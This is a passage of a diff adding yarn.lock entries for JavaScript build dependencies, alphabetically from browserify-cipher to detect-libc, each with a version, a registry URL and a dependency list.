dependencies: + buffer-xor "^1.0.3" + cipher-base "^1.0.0" + create-hash "^1.1.0" + evp_bytestokey "^1.0.3" + inherits "^2.0.1" + safe-buffer "^5.0.1" + +browserify-cipher@^1.0.0: + version "1.0.1" + resolved "https://registry.yarnpkg.com/browserify-cipher/-/browserify-cipher-1.0.1.tgz#8d6474c1b870bfdabcd3bcfcc1934a10e94f15f0" + dependencies: + browserify-aes "^1.0.4" + browserify-des "^1.0.0" + evp_bytestokey "^1.0.0" + +browserify-des@^1.0.0: + version "1.0.1" + resolved "https://registry.yarnpkg.com/browserify-des/-/browserify-des-1.0.1.tgz#3343124db6d7ad53e26a8826318712bdc8450f9c" + dependencies: + cipher-base "^1.0.1" + des.js "^1.0.0" + inherits "^2.0.1" + +browserify-rsa@^4.0.0: + version "4.0.1" + resolved "https://registry.yarnpkg.com/browserify-rsa/-/browserify-rsa-4.0.1.tgz#21e0abfaf6f2029cf2fafb133567a701d4135524" + dependencies: + bn.js "^4.1.0" + randombytes "^2.0.1" + +browserify-sign@^4.0.0: + version "4.0.4" + resolved "https://registry.yarnpkg.com/browserify-sign/-/browserify-sign-4.0.4.tgz#aa4eb68e5d7b658baa6bf6a57e630cbd7a93d298" + dependencies: + bn.js "^4.1.1" + browserify-rsa "^4.0.0" + create-hash "^1.1.0" + create-hmac "^1.1.2" + elliptic "^6.0.0" + inherits "^2.0.1" + parse-asn1 "^5.0.0" + +browserify-zlib@^0.2.0: + version "0.2.0" + resolved "https://registry.yarnpkg.com/browserify-zlib/-/browserify-zlib-0.2.0.tgz#2869459d9aa3be245fe8fe2ca1f46e2e7f54d73f" + dependencies: + pako "~1.0.5" + +browserslist@^1.3.6, browserslist@^1.5.2, browserslist@^1.7.6: + version "1.7.7" + resolved "https://registry.yarnpkg.com/browserslist/-/browserslist-1.7.7.tgz#0bd76704258be829b2398bb50e4b62d1a166b0b9" + dependencies: + caniuse-db "^1.0.30000639" + electron-to-chromium "^1.2.7" + +browserslist@^3.0.0, browserslist@^3.2.8: + version "3.2.8" + resolved "https://registry.yarnpkg.com/browserslist/-/browserslist-3.2.8.tgz#b0005361d6471f0f5952797a76fc985f1f978fc6" + dependencies: + caniuse-lite "^1.0.30000844" + electron-to-chromium "^1.3.47" + +buffer-from@^1.0.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/buffer-from/-/buffer-from-1.1.0.tgz#87fcaa3a298358e0ade6e442cfce840740d1ad04" + +buffer-xor@^1.0.3: + version "1.0.3" + resolved "https://registry.yarnpkg.com/buffer-xor/-/buffer-xor-1.0.3.tgz#26e61ed1422fb70dd42e6e36729ed51d855fe8d9" + +buffer@^4.3.0: + version "4.9.1" + resolved "https://registry.yarnpkg.com/buffer/-/buffer-4.9.1.tgz#6d1bb601b07a4efced97094132093027c95bc298" + dependencies: + base64-js "^1.0.2" + ieee754 "^1.1.4" + isarray "^1.0.0" + +builtin-modules@^1.0.0: + version "1.1.1" + resolved "https://registry.yarnpkg.com/builtin-modules/-/builtin-modules-1.1.1.tgz#270f076c5a72c02f5b65a47df94c5fe3a278892f" + +builtin-status-codes@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/builtin-status-codes/-/builtin-status-codes-3.0.0.tgz#85982878e21b98e1c66425e03d0174788f569ee8" + +cacache@^10.0.4: + version "10.0.4" + resolved "https://registry.yarnpkg.com/cacache/-/cacache-10.0.4.tgz#6452367999eff9d4188aefd9a14e9d7c6a263460" + dependencies: + bluebird "^3.5.1" + chownr "^1.0.1" + glob "^7.1.2" + graceful-fs "^4.1.11" + lru-cache "^4.1.1" + mississippi "^2.0.0" + mkdirp "^0.5.1" + move-concurrently "^1.0.1" + promise-inflight "^1.0.1" + rimraf "^2.6.2" + ssri "^5.2.4" + unique-filename "^1.1.0" + y18n "^4.0.0" + +cache-base@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/cache-base/-/cache-base-1.0.1.tgz#0a7f46416831c8b662ee36fe4e7c59d76f666ab2" + dependencies: + collection-visit "^1.0.0" + component-emitter "^1.2.1" + get-value "^2.0.6" + has-value "^1.0.0" + isobject "^3.0.1" + set-value "^2.0.0" + to-object-path "^0.3.0" + union-value "^1.0.0" + unset-value "^1.0.0" + +cache-loader@^1.2.2: + version "1.2.2" + resolved "https://registry.yarnpkg.com/cache-loader/-/cache-loader-1.2.2.tgz#6d5c38ded959a09cc5d58190ab5af6f73bd353f5" + dependencies: + loader-utils "^1.1.0" + mkdirp "^0.5.1" + neo-async "^2.5.0" + schema-utils "^0.4.2" + +call-me-maybe@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/call-me-maybe/-/call-me-maybe-1.0.1.tgz#26d208ea89e37b5cbde60250a15f031c16a4d66b" + +camel-case@3.0.x: + version "3.0.0" + resolved "https://registry.yarnpkg.com/camel-case/-/camel-case-3.0.0.tgz#ca3c3688a4e9cf3a4cda777dc4dcbc713249cf73" + dependencies: + no-case "^2.2.0" + upper-case "^1.1.1" + +camelcase-keys@^4.0.0: + version "4.2.0" + resolved "https://registry.yarnpkg.com/camelcase-keys/-/camelcase-keys-4.2.0.tgz#a2aa5fb1af688758259c32c141426d78923b9b77" + dependencies: + camelcase "^4.1.0" + map-obj "^2.0.0" + quick-lru "^1.0.0" + +camelcase@^4.0.0, camelcase@^4.1.0: + version "4.1.0" + resolved "https://registry.yarnpkg.com/camelcase/-/camelcase-4.1.0.tgz#d545635be1e33c542649c69173e5de6acfae34dd" + +caniuse-api@^1.5.2: + version "1.6.1" + resolved "https://registry.yarnpkg.com/caniuse-api/-/caniuse-api-1.6.1.tgz#b534e7c734c4f81ec5fbe8aca2ad24354b962c6c" + dependencies: + browserslist "^1.3.6" + caniuse-db "^1.0.30000529" + lodash.memoize "^4.1.2" + lodash.uniq "^4.5.0" + +caniuse-db@^1.0.30000529, caniuse-db@^1.0.30000634, caniuse-db@^1.0.30000639: + version "1.0.30000856" + resolved "https://registry.yarnpkg.com/caniuse-db/-/caniuse-db-1.0.30000856.tgz#fbebb99abe15a5654fc7747ebb5315bdfde3358f" + +caniuse-lite@^1.0.30000844, caniuse-lite@^1.0.30000856: + version "1.0.30000856" + resolved "https://registry.yarnpkg.com/caniuse-lite/-/caniuse-lite-1.0.30000856.tgz#ecc16978135a6f219b138991eb62009d25ee8daa" + +capture-stack-trace@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/capture-stack-trace/-/capture-stack-trace-1.0.0.tgz#4a6fa07399c26bba47f0b2496b4d0fb408c5550d" + +chalk@^1.1.3: + version "1.1.3" + resolved "https://registry.yarnpkg.com/chalk/-/chalk-1.1.3.tgz#a8115c55e4a702fe4d150abd3872822a7e09fc98" + dependencies: + ansi-styles "^2.2.1" + escape-string-regexp "^1.0.2" + has-ansi "^2.0.0" + strip-ansi "^3.0.0" + supports-color "^2.0.0" + +chalk@^2.0.0, chalk@^2.0.1, chalk@^2.1.0, chalk@^2.3.0, chalk@^2.3.2, chalk@^2.4.1: + version "2.4.1" + resolved "https://registry.yarnpkg.com/chalk/-/chalk-2.4.1.tgz#18c49ab16a037b6eb0152cc83e3471338215b66e" + dependencies: + ansi-styles "^3.2.1" + escape-string-regexp "^1.0.5" + supports-color "^5.3.0" + +chokidar@^2.0.2, chokidar@^2.0.3: + version "2.0.4" + resolved "https://registry.yarnpkg.com/chokidar/-/chokidar-2.0.4.tgz#356ff4e2b0e8e43e322d18a372460bbcf3accd26" + dependencies: + anymatch "^2.0.0" + async-each "^1.0.0" + braces "^2.3.0" + glob-parent "^3.1.0" + inherits "^2.0.1" + is-binary-path "^1.0.0" + is-glob "^4.0.0" + lodash.debounce "^4.0.8" + normalize-path "^2.1.1" + path-is-absolute "^1.0.0" + readdirp "^2.0.0" + upath "^1.0.5" + optionalDependencies: + fsevents "^1.2.2" + +chownr@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/chownr/-/chownr-1.0.1.tgz#e2a75042a9551908bebd25b8523d5f9769d79181" + +chrome-trace-event@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/chrome-trace-event/-/chrome-trace-event-1.0.0.tgz#45a91bd2c20c9411f0963b5aaeb9a1b95e09cc48" + dependencies: + tslib "^1.9.0" + +ci-info@^1.0.0: + version "1.1.3" + resolved "https://registry.yarnpkg.com/ci-info/-/ci-info-1.1.3.tgz#710193264bb05c77b8c90d02f5aaf22216a667b2" + +cipher-base@^1.0.0, cipher-base@^1.0.1, cipher-base@^1.0.3: + version "1.0.4" + resolved "https://registry.yarnpkg.com/cipher-base/-/cipher-base-1.0.4.tgz#8760e4ecc272f4c363532f926d874aae2c1397de" + dependencies: + inherits "^2.0.1" + safe-buffer "^5.0.1" + +clap@^1.0.9: + version "1.2.3" + resolved "https://registry.yarnpkg.com/clap/-/clap-1.2.3.tgz#4f36745b32008492557f46412d66d50cb99bce51" + dependencies: + chalk "^1.1.3" + +class-utils@^0.3.5: + version "0.3.6" + resolved "https://registry.yarnpkg.com/class-utils/-/class-utils-0.3.6.tgz#f93369ae8b9a7ce02fd41faad0ca83033190c463" + dependencies: + arr-union "^3.1.0" + define-property "^0.2.5" + isobject "^3.0.0" + static-extend "^0.1.1" + +clean-css@4.1.x: + version "4.1.11" + resolved "https://registry.yarnpkg.com/clean-css/-/clean-css-4.1.11.tgz#2ecdf145aba38f54740f26cefd0ff3e03e125d6a" + dependencies: + source-map "0.5.x" + +cli-boxes@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/cli-boxes/-/cli-boxes-1.0.0.tgz#4fa917c3e59c94a004cd61f8ee509da651687143" + +cli-cursor@^2.0.0: + version "2.1.0" + resolved "https://registry.yarnpkg.com/cli-cursor/-/cli-cursor-2.1.0.tgz#b35dac376479facc3e94747d41d0d0f5238ffcb5" + dependencies: + restore-cursor "^2.0.0" + +clipboard@^2.0.0: + version "2.0.1" + resolved "https://registry.yarnpkg.com/clipboard/-/clipboard-2.0.1.tgz#a12481e1c13d8a50f5f036b0560fe5d16d74e46a" + dependencies: + good-listener "^1.2.2" + select "^1.1.2" + tiny-emitter "^2.0.0" + +clipboardy@^1.2.2: + version "1.2.3" + resolved "https://registry.yarnpkg.com/clipboardy/-/clipboardy-1.2.3.tgz#0526361bf78724c1f20be248d428e365433c07ef" + dependencies: + arch "^2.1.0" + execa "^0.8.0" + +clone@^1.0.2: + version "1.0.4" + resolved "https://registry.yarnpkg.com/clone/-/clone-1.0.4.tgz#da309cc263df15994c688ca902179ca3c7cd7c7e" + +co@^4.6.0: + version "4.6.0" + resolved "https://registry.yarnpkg.com/co/-/co-4.6.0.tgz#6ea6bdf3d853ae54ccb8e47bfa0bf3f9031fb184" + +coa@~1.0.1: + version "1.0.4" + resolved "https://registry.yarnpkg.com/coa/-/coa-1.0.4.tgz#a9ef153660d6a86a8bdec0289a5c684d217432fd" + dependencies: + q "^1.1.2" + +code-point-at@^1.0.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/code-point-at/-/code-point-at-1.1.0.tgz#0d070b4d043a5bea33a2f1a40e2edb3d9a4ccf77" + +collection-visit@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/collection-visit/-/collection-visit-1.0.0.tgz#4bc0373c164bc3291b4d368c829cf1a80a59dca0" + dependencies: + map-visit "^1.0.0" + object-visit "^1.0.0" + +color-convert@^1.3.0, color-convert@^1.9.0: + version "1.9.2" + resolved "https://registry.yarnpkg.com/color-convert/-/color-convert-1.9.2.tgz#49881b8fba67df12a96bdf3f56c0aab9e7913147" + dependencies: + color-name "1.1.1" + +color-name@1.1.1: + version "1.1.1" + resolved "https://registry.yarnpkg.com/color-name/-/color-name-1.1.1.tgz#4b1415304cf50028ea81643643bd82ea05803689" + +color-name@^1.0.0: + version "1.1.3" + resolved "https://registry.yarnpkg.com/color-name/-/color-name-1.1.3.tgz#a7d0558bd89c42f795dd42328f740831ca53bc25" + +color-string@^0.3.0: + version "0.3.0" + resolved "https://registry.yarnpkg.com/color-string/-/color-string-0.3.0.tgz#27d46fb67025c5c2fa25993bfbf579e47841b991" + dependencies: + color-name "^1.0.0" + +color@^0.11.0: + version "0.11.4" + resolved "https://registry.yarnpkg.com/color/-/color-0.11.4.tgz#6d7b5c74fb65e841cd48792ad1ed5e07b904d764" + dependencies: + clone "^1.0.2" + color-convert "^1.3.0" + color-string "^0.3.0" + +colormin@^1.0.5: + version "1.1.2" + resolved "https://registry.yarnpkg.com/colormin/-/colormin-1.1.2.tgz#ea2f7420a72b96881a38aae59ec124a6f7298133" + dependencies: + color "^0.11.0" + css-color-names "0.0.4" + has "^1.0.1" + +colors@~1.1.2: + version "1.1.2" + resolved "https://registry.yarnpkg.com/colors/-/colors-1.1.2.tgz#168a4701756b6a7f51a12ce0c97bfa28c084ed63" + +commander@2.15.x, commander@^2.15.1, commander@~2.15.0: + version "2.15.1" + resolved "https://registry.yarnpkg.com/commander/-/commander-2.15.1.tgz#df46e867d0fc2aec66a34662b406a9ccafff5b0f" + +commander@~2.13.0: + version "2.13.0" + resolved "https://registry.yarnpkg.com/commander/-/commander-2.13.0.tgz#6964bca67685df7c1f1430c584f07d7597885b9c" + +common-tags@^1.4.0: + version "1.8.0" + resolved "https://registry.yarnpkg.com/common-tags/-/common-tags-1.8.0.tgz#8e3153e542d4a39e9b10554434afaaf98956a937" + +commondir@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/commondir/-/commondir-1.0.1.tgz#ddd800da0c66127393cca5950ea968a3aaf1253b" + +component-emitter@^1.2.1: + version "1.2.1" + resolved "https://registry.yarnpkg.com/component-emitter/-/component-emitter-1.2.1.tgz#137918d6d78283f7df7a6b7c5a63e140e69425e6" + +concat-map@0.0.1: + version "0.0.1" + resolved "https://registry.yarnpkg.com/concat-map/-/concat-map-0.0.1.tgz#d8a96bd77fd68df7793a73036a3ba0d5405d477b" + +concat-stream@^1.5.0: + version "1.6.2" + resolved "https://registry.yarnpkg.com/concat-stream/-/concat-stream-1.6.2.tgz#904bdf194cd3122fc675c77fc4ac3d4ff0fd1a34" + dependencies: + buffer-from "^1.0.0" + inherits "^2.0.3" + readable-stream "^2.2.2" + typedarray "^0.0.6" + +configstore@^3.0.0: + version "3.1.2" + resolved "https://registry.yarnpkg.com/configstore/-/configstore-3.1.2.tgz#c6f25defaeef26df12dd33414b001fe81a543f8f" + dependencies: + dot-prop "^4.1.0" + graceful-fs "^4.1.2" + make-dir "^1.0.0" + unique-string "^1.0.0" + write-file-atomic "^2.0.0" + xdg-basedir "^3.0.0" + +connect-history-api-fallback@^1.5.0: + version "1.5.0" + resolved "https://registry.yarnpkg.com/connect-history-api-fallback/-/connect-history-api-fallback-1.5.0.tgz#b06873934bc5e344fef611a196a6faae0aee015a" + +consola@^1.2.0: + version "1.4.1" + resolved "https://registry.yarnpkg.com/consola/-/consola-1.4.1.tgz#4b1c6259c8db23f51e7cfb68cd383ec5ee298f0e" + dependencies: + chalk "^2.3.2" + figures "^2.0.0" + lodash "^4.17.5" + std-env "^1.1.0" + +console-browserify@^1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/console-browserify/-/console-browserify-1.1.0.tgz#f0241c45730a9fc6323b206dbf38edc741d0bb10" + dependencies: + date-now "^0.1.4" + +console-control-strings@^1.0.0, console-control-strings@~1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/console-control-strings/-/console-control-strings-1.1.0.tgz#3d7cf4464db6446ea644bf4b39507f9851008e8e" + +consolidate@^0.15.1: + version "0.15.1" + resolved "https://registry.yarnpkg.com/consolidate/-/consolidate-0.15.1.tgz#21ab043235c71a07d45d9aad98593b0dba56bab7" + dependencies: + bluebird "^3.1.1" + +constants-browserify@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/constants-browserify/-/constants-browserify-1.0.0.tgz#c20b96d8c617748aaf1c16021760cd27fcb8cb75" + +content-disposition@~0.5.0: + version "0.5.2" + resolved "https://registry.yarnpkg.com/content-disposition/-/content-disposition-0.5.2.tgz#0cf68bb9ddf5f2be7961c3a85178cb85dba78cb4" + +content-type@^1.0.0: + version "1.0.4" + resolved "https://registry.yarnpkg.com/content-type/-/content-type-1.0.4.tgz#e138cc75e040c727b1966fe5e5f8c9aee256fe3b" + +convert-source-map@^1.1.0: + version "1.5.1" + resolved "https://registry.yarnpkg.com/convert-source-map/-/convert-source-map-1.5.1.tgz#b8278097b9bc229365de5c62cf5fcaed8b5599e5" + +cookies@~0.7.0: + version "0.7.1" + resolved "https://registry.yarnpkg.com/cookies/-/cookies-0.7.1.tgz#7c8a615f5481c61ab9f16c833731bcb8f663b99b" + dependencies: + depd "~1.1.1" + keygrip "~1.0.2" + +copy-concurrently@^1.0.0: + version "1.0.5" + resolved "https://registry.yarnpkg.com/copy-concurrently/-/copy-concurrently-1.0.5.tgz#92297398cae34937fcafd6ec8139c18051f0b5e0" + dependencies: + aproba "^1.1.1" + fs-write-stream-atomic "^1.0.8" + iferr "^0.1.5" + mkdirp "^0.5.1" + rimraf "^2.5.4" + run-queue "^1.0.0" + +copy-descriptor@^0.1.0: + version "0.1.1" + resolved "https://registry.yarnpkg.com/copy-descriptor/-/copy-descriptor-0.1.1.tgz#676f6eb3c39997c2ee1ac3a924fd6124748f578d" + +copy-webpack-plugin@^4.5.1: + version "4.5.1" + resolved "https://registry.yarnpkg.com/copy-webpack-plugin/-/copy-webpack-plugin-4.5.1.tgz#fc4f68f4add837cc5e13d111b20715793225d29c" + dependencies: + cacache "^10.0.4" + find-cache-dir "^1.0.0" + globby "^7.1.1" + is-glob "^4.0.0" + loader-utils "^1.1.0" + minimatch "^3.0.4" + p-limit "^1.0.0" + serialize-javascript "^1.4.0" + +core-js@^2.4.0, core-js@^2.5.3: + version "2.5.7" + resolved "https://registry.yarnpkg.com/core-js/-/core-js-2.5.7.tgz#f972608ff0cead68b841a16a932d0b183791814e" + +core-util-is@~1.0.0: + version "1.0.2" + resolved "https://registry.yarnpkg.com/core-util-is/-/core-util-is-1.0.2.tgz#b5fd54220aa2bc5ab57aab7140c940754503c1a7" + +cosmiconfig@^2.1.0, cosmiconfig@^2.1.1: + version "2.2.2" + resolved "https://registry.yarnpkg.com/cosmiconfig/-/cosmiconfig-2.2.2.tgz#6173cebd56fac042c1f4390edf7af6c07c7cb892" + dependencies: + is-directory "^0.3.1" + js-yaml "^3.4.3" + minimist "^1.2.0" + object-assign "^4.1.0" + os-homedir "^1.0.1" + parse-json "^2.2.0" + require-from-string "^1.1.0" + +cosmiconfig@^5.0.2: + version "5.0.5" + resolved "https://registry.yarnpkg.com/cosmiconfig/-/cosmiconfig-5.0.5.tgz#a809e3c2306891ce17ab70359dc8bdf661fe2cd0" + dependencies: + is-directory "^0.3.1" + js-yaml "^3.9.0" + parse-json "^4.0.0" + +create-ecdh@^4.0.0: + version "4.0.3" + resolved "https://registry.yarnpkg.com/create-ecdh/-/create-ecdh-4.0.3.tgz#c9111b6f33045c4697f144787f9254cdc77c45ff" + dependencies: + bn.js "^4.1.0" + elliptic "^6.0.0" + +create-error-class@^3.0.0: + version "3.0.2" + resolved "https://registry.yarnpkg.com/create-error-class/-/create-error-class-3.0.2.tgz#06be7abef947a3f14a30fd610671d401bca8b7b6" + dependencies: + capture-stack-trace "^1.0.0" + +create-hash@^1.1.0, create-hash@^1.1.2: + version "1.2.0" + resolved "https://registry.yarnpkg.com/create-hash/-/create-hash-1.2.0.tgz#889078af11a63756bcfb59bd221996be3a9ef196" + dependencies: + cipher-base "^1.0.1" + inherits "^2.0.1" + md5.js "^1.3.4" + ripemd160 "^2.0.1" + sha.js "^2.4.0" + +create-hmac@^1.1.0, create-hmac@^1.1.2, create-hmac@^1.1.4: + version "1.1.7" + resolved "https://registry.yarnpkg.com/create-hmac/-/create-hmac-1.1.7.tgz#69170c78b3ab957147b2b8b04572e47ead2243ff" + dependencies: + cipher-base "^1.0.3" + create-hash "^1.1.0" + inherits "^2.0.1" + ripemd160 "^2.0.0" + safe-buffer "^5.0.1" + sha.js "^2.4.8" + +cross-spawn@^5.0.1: + version "5.1.0" + resolved "https://registry.yarnpkg.com/cross-spawn/-/cross-spawn-5.1.0.tgz#e8bd0efee58fcff6f8f94510a0a554bbfa235449" + dependencies: + lru-cache "^4.0.1" + shebang-command "^1.2.0" + which "^1.2.9" + +cross-spawn@^6.0.5: + version "6.0.5" + resolved "https://registry.yarnpkg.com/cross-spawn/-/cross-spawn-6.0.5.tgz#4a5ec7c64dfae22c3a14124dbacdee846d80cbc4" + dependencies: + nice-try "^1.0.4" + path-key "^2.0.1" + semver "^5.5.0" + shebang-command "^1.2.0" + which "^1.2.9" + +crypto-browserify@^3.11.0: + version "3.12.0" + resolved "https://registry.yarnpkg.com/crypto-browserify/-/crypto-browserify-3.12.0.tgz#396cf9f3137f03e4b8e532c58f698254e00f80ec" + dependencies: + browserify-cipher "^1.0.0" + browserify-sign "^4.0.0" + create-ecdh "^4.0.0" + create-hash "^1.1.0" + create-hmac "^1.1.0" + diffie-hellman "^5.0.0" + inherits "^2.0.1" + pbkdf2 "^3.0.3" + public-encrypt "^4.0.0" + randombytes "^2.0.0" + randomfill "^1.0.3" + +crypto-random-string@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/crypto-random-string/-/crypto-random-string-1.0.0.tgz#a230f64f568310e1498009940790ec99545bca7e" + +css-color-names@0.0.4: + version "0.0.4" + resolved "https://registry.yarnpkg.com/css-color-names/-/css-color-names-0.0.4.tgz#808adc2e79cf84738069b646cb20ec27beb629e0" + +css-loader@^0.28.11: + version "0.28.11" + resolved "https://registry.yarnpkg.com/css-loader/-/css-loader-0.28.11.tgz#c3f9864a700be2711bb5a2462b2389b1a392dab7" + dependencies: + babel-code-frame "^6.26.0" + css-selector-tokenizer "^0.7.0" + cssnano "^3.10.0" + icss-utils "^2.1.0" + loader-utils "^1.0.2" + lodash.camelcase "^4.3.0" + object-assign "^4.1.1" + postcss "^5.0.6" + postcss-modules-extract-imports "^1.2.0" + postcss-modules-local-by-default "^1.2.0" + postcss-modules-scope "^1.1.0" + postcss-modules-values "^1.3.0" + postcss-value-parser "^3.3.0" + source-list-map "^2.0.0" + +css-parse@1.7.x: + version "1.7.0" + resolved "https://registry.yarnpkg.com/css-parse/-/css-parse-1.7.0.tgz#321f6cf73782a6ff751111390fc05e2c657d8c9b" + +css-select@^1.1.0: + version "1.2.0" + resolved "https://registry.yarnpkg.com/css-select/-/css-select-1.2.0.tgz#2b3a110539c5355f1cd8d314623e870b121ec858" + dependencies: + boolbase "~1.0.0" + css-what "2.1" + domutils "1.5.1" + nth-check "~1.0.1" + +css-selector-tokenizer@^0.7.0: + version "0.7.0" + resolved "https://registry.yarnpkg.com/css-selector-tokenizer/-/css-selector-tokenizer-0.7.0.tgz#e6988474ae8c953477bf5e7efecfceccd9cf4c86" + dependencies: + cssesc "^0.1.0" + fastparse "^1.1.1" + regexpu-core "^1.0.0" + +css-what@2.1: + version "2.1.0" + resolved "https://registry.yarnpkg.com/css-what/-/css-what-2.1.0.tgz#9467d032c38cfaefb9f2d79501253062f87fa1bd" + +cssesc@^0.1.0: + version "0.1.0" + resolved "https://registry.yarnpkg.com/cssesc/-/cssesc-0.1.0.tgz#c814903e45623371a0477b40109aaafbeeaddbb4" + +cssnano@^3.10.0: + version "3.10.0" + resolved "https://registry.yarnpkg.com/cssnano/-/cssnano-3.10.0.tgz#4f38f6cea2b9b17fa01490f23f1dc68ea65c1c38" + dependencies: + autoprefixer "^6.3.1" + decamelize "^1.1.2" + defined "^1.0.0" + has "^1.0.1" + object-assign "^4.0.1" + postcss "^5.0.14" + postcss-calc "^5.2.0" + postcss-colormin "^2.1.8" + postcss-convert-values "^2.3.4" + postcss-discard-comments "^2.0.4" + postcss-discard-duplicates "^2.0.1" + postcss-discard-empty "^2.0.1" + postcss-discard-overridden "^0.1.1" + postcss-discard-unused "^2.2.1" + postcss-filter-plugins "^2.0.0" + postcss-merge-idents "^2.1.5" + postcss-merge-longhand "^2.0.1" + postcss-merge-rules "^2.0.3" + postcss-minify-font-values "^1.0.2" + postcss-minify-gradients "^1.0.1" + postcss-minify-params "^1.0.4" + postcss-minify-selectors "^2.0.4" + postcss-normalize-charset "^1.1.0" + postcss-normalize-url "^3.0.7" + postcss-ordered-values "^2.1.0" + postcss-reduce-idents "^2.2.2" + postcss-reduce-initial "^1.0.0" + postcss-reduce-transforms "^1.0.3" + postcss-svgo "^2.1.1" + postcss-unique-selectors "^2.0.2" + postcss-value-parser "^3.2.3" + postcss-zindex "^2.0.1" + +csso@~2.3.1: + version "2.3.2" + resolved "https://registry.yarnpkg.com/csso/-/csso-2.3.2.tgz#ddd52c587033f49e94b71fc55569f252e8ff5f85" + dependencies: + clap "^1.0.9" + source-map "^0.5.3" + +currently-unhandled@^0.4.1: + version "0.4.1" + resolved "https://registry.yarnpkg.com/currently-unhandled/-/currently-unhandled-0.4.1.tgz#988df33feab191ef799a61369dd76c17adf957ea" + dependencies: + array-find-index "^1.0.1" + +cyclist@~0.2.2: + version "0.2.2" + resolved "https://registry.yarnpkg.com/cyclist/-/cyclist-0.2.2.tgz#1b33792e11e914a2fd6d6ed6447464444e5fa640" + +d@1: + version "1.0.0" + resolved "https://registry.yarnpkg.com/d/-/d-1.0.0.tgz#754bb5bfe55451da69a58b94d45f4c5b0462d58f" + dependencies: + es5-ext "^0.10.9" + +date-now@^0.1.4: + version "0.1.4" + resolved "https://registry.yarnpkg.com/date-now/-/date-now-0.1.4.tgz#eaf439fd4d4848ad74e5cc7dbef200672b9e345b" + +de-indent@^1.0.2: + version "1.0.2" + resolved "https://registry.yarnpkg.com/de-indent/-/de-indent-1.0.2.tgz#b2038e846dc33baa5796128d0804b455b8c1e21d" + +debug@*, debug@^3.1.0: + version "3.1.0" + resolved "https://registry.yarnpkg.com/debug/-/debug-3.1.0.tgz#5bb5a0672628b64149566ba16819e61518c67261" + dependencies: + ms "2.0.0" + +debug@^2.1.2, debug@^2.2.0, debug@^2.3.3, debug@^2.6.1, debug@^2.6.3, debug@^2.6.8: + version "2.6.9" + resolved "https://registry.yarnpkg.com/debug/-/debug-2.6.9.tgz#5d128515df134ff327e90a4c93f4e077a536341f" + dependencies: + ms "2.0.0" + +decamelize-keys@^1.0.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/decamelize-keys/-/decamelize-keys-1.1.0.tgz#d171a87933252807eb3cb61dc1c1445d078df2d9" + dependencies: + decamelize "^1.1.0" + map-obj "^1.0.0" + +decamelize@^1.1.0, decamelize@^1.1.2: + version "1.2.0" + resolved "https://registry.yarnpkg.com/decamelize/-/decamelize-1.2.0.tgz#f6534d15148269b20352e7bee26f501f9a191290" + +decode-uri-component@^0.2.0: + version "0.2.0" + resolved "https://registry.yarnpkg.com/decode-uri-component/-/decode-uri-component-0.2.0.tgz#eb3913333458775cb84cd1a1fae062106bb87545" + +deep-equal@~1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/deep-equal/-/deep-equal-1.0.1.tgz#f5d260292b660e084eff4cdbc9f08ad3247448b5" + +deep-extend@^0.6.0: + version "0.6.0" + resolved "https://registry.yarnpkg.com/deep-extend/-/deep-extend-0.6.0.tgz#c4fa7c95404a17a9c3e8ca7e1537312b736330ac" + +deepmerge@^1.5.2: + version "1.5.2" + resolved "https://registry.yarnpkg.com/deepmerge/-/deepmerge-1.5.2.tgz#10499d868844cdad4fee0842df8c7f6f0c95a753" + +define-properties@^1.1.2: + version "1.1.2" + resolved "https://registry.yarnpkg.com/define-properties/-/define-properties-1.1.2.tgz#83a73f2fea569898fb737193c8f873caf6d45c94" + dependencies: + foreach "^2.0.5" + object-keys "^1.0.8" + +define-property@^0.2.5: + version "0.2.5" + resolved "https://registry.yarnpkg.com/define-property/-/define-property-0.2.5.tgz#c35b1ef918ec3c990f9a5bc57be04aacec5c8116" + dependencies: + is-descriptor "^0.1.0" + +define-property@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/define-property/-/define-property-1.0.0.tgz#769ebaaf3f4a63aad3af9e8d304c9bbe79bfb0e6" + dependencies: + is-descriptor "^1.0.0" + +define-property@^2.0.2: + version "2.0.2" + resolved "https://registry.yarnpkg.com/define-property/-/define-property-2.0.2.tgz#d459689e8d654ba77e02a817f8710d702cb16e9d" + dependencies: + is-descriptor "^1.0.2" + isobject "^3.0.1" + +defined@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/defined/-/defined-1.0.0.tgz#c98d9bcef75674188e110969151199e39b1fa693" + +delegate@^3.1.2: + version "3.2.0" + resolved "https://registry.yarnpkg.com/delegate/-/delegate-3.2.0.tgz#b66b71c3158522e8ab5744f720d8ca0c2af59166" + +delegates@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/delegates/-/delegates-1.0.0.tgz#84c6e159b81904fdca59a0ef44cd870d31250f9a" + +depd@^1.1.0, depd@~1.1.1, depd@~1.1.2: + version "1.1.2" + resolved "https://registry.yarnpkg.com/depd/-/depd-1.1.2.tgz#9bcd52e14c097763e749b274c4346ed2e560b5a9" + +des.js@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/des.js/-/des.js-1.0.0.tgz#c074d2e2aa6a8a9a07dbd61f9a15c2cd83ec8ecc" + dependencies: + inherits "^2.0.1" + minimalistic-assert "^1.0.0" + +destroy@^1.0.3: + version "1.0.4" + resolved "https://registry.yarnpkg.com/destroy/-/destroy-1.0.4.tgz#978857442c44749e4206613e37946205826abd80" + +detect-libc@^1.0.2: + version "1.0.3" + resolved "https://registry.yarnpkg.com/detect-libc/-/detect-libc-1.0.3.tgz#fa137c4bd698edf55cd5cd02ac559f91a4c4ba9b" + 